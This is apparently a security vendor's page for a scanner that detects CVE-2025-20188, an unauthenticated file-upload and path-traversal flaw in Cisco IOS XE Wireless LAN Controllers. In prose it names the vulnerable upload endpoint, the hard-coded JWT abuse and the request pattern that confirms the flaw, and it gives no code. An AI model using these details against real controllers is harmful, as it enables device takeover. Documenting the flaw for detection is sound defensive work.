CVE-2025-20188 Scanner

CVE-2025-20188 Scanner - Arbitrary File Upload vulnerability in Cisco IOS XE WLC

Short Info


Level

Critical

Single Scan

Single Scan

Can be used by

Asset Owner

Estimated Time

10 seconds

Time Interval

8 days 4 hours

Scan only one

Domain, Subdomain, IPv4

Toolbox

-

Cisco IOS XE Wireless LAN Controllers (WLC) are enterprise-grade devices used to manage and control wireless network access points within organizational environments. These controllers provide centralized management, security, and policy enforcement for Wi-Fi networks. They are widely deployed in corporate, educational, and governmental networks to ensure secure and efficient wireless connectivity. Cisco IOS XE WLC software is regularly updated to patch vulnerabilities and improve network performance. The devices support Out-of-Band AP Image Download functionality to facilitate firmware updates for connected access points. Network administrators rely on these controllers to maintain secure wireless infrastructure.

This vulnerability allows unauthenticated remote attackers to exploit the Out-of-Band AP Image Download feature by abusing a hard-coded JSON Web Token (JWT) in the system. By sending crafted HTTPS POST requests to the upload interface, an attacker can bypass authentication and upload arbitrary files. The vulnerability also enables path traversal attacks and execution of arbitrary commands with root privileges, potentially compromising the entire device. The flaw stems from insufficient validation and improper use of authentication tokens in the firmware.

Technically, the exploit involves sending specially crafted multipart/form-data POST requests to the /ap_spec_rec/upload/ endpoint. The attacker uses a JWT cookie with either a random or crafted token and includes file uploads with path traversal sequences in the filename parameter. The vulnerability is confirmed by observing specific server responses, including a 200 status code and the presence of OpenResty server headers. A follow-up GET request checks if the uploaded file is accessible, confirming successful arbitrary file upload. This attack chain enables full compromise of the device and potentially the connected network.

Successful exploitation can lead to complete control over the WLC, allowing attackers to execute arbitrary code with root privileges. This jeopardizes the confidentiality, integrity, and availability of the wireless network infrastructure. Attackers can manipulate network traffic, disrupt wireless services, install persistent malware, or pivot to other systems within the organization. Given the critical nature of the flaw, immediate patching and mitigation are vital to prevent network-wide compromise and operational disruption.

REFERENCES

Get started to protecting your digital assets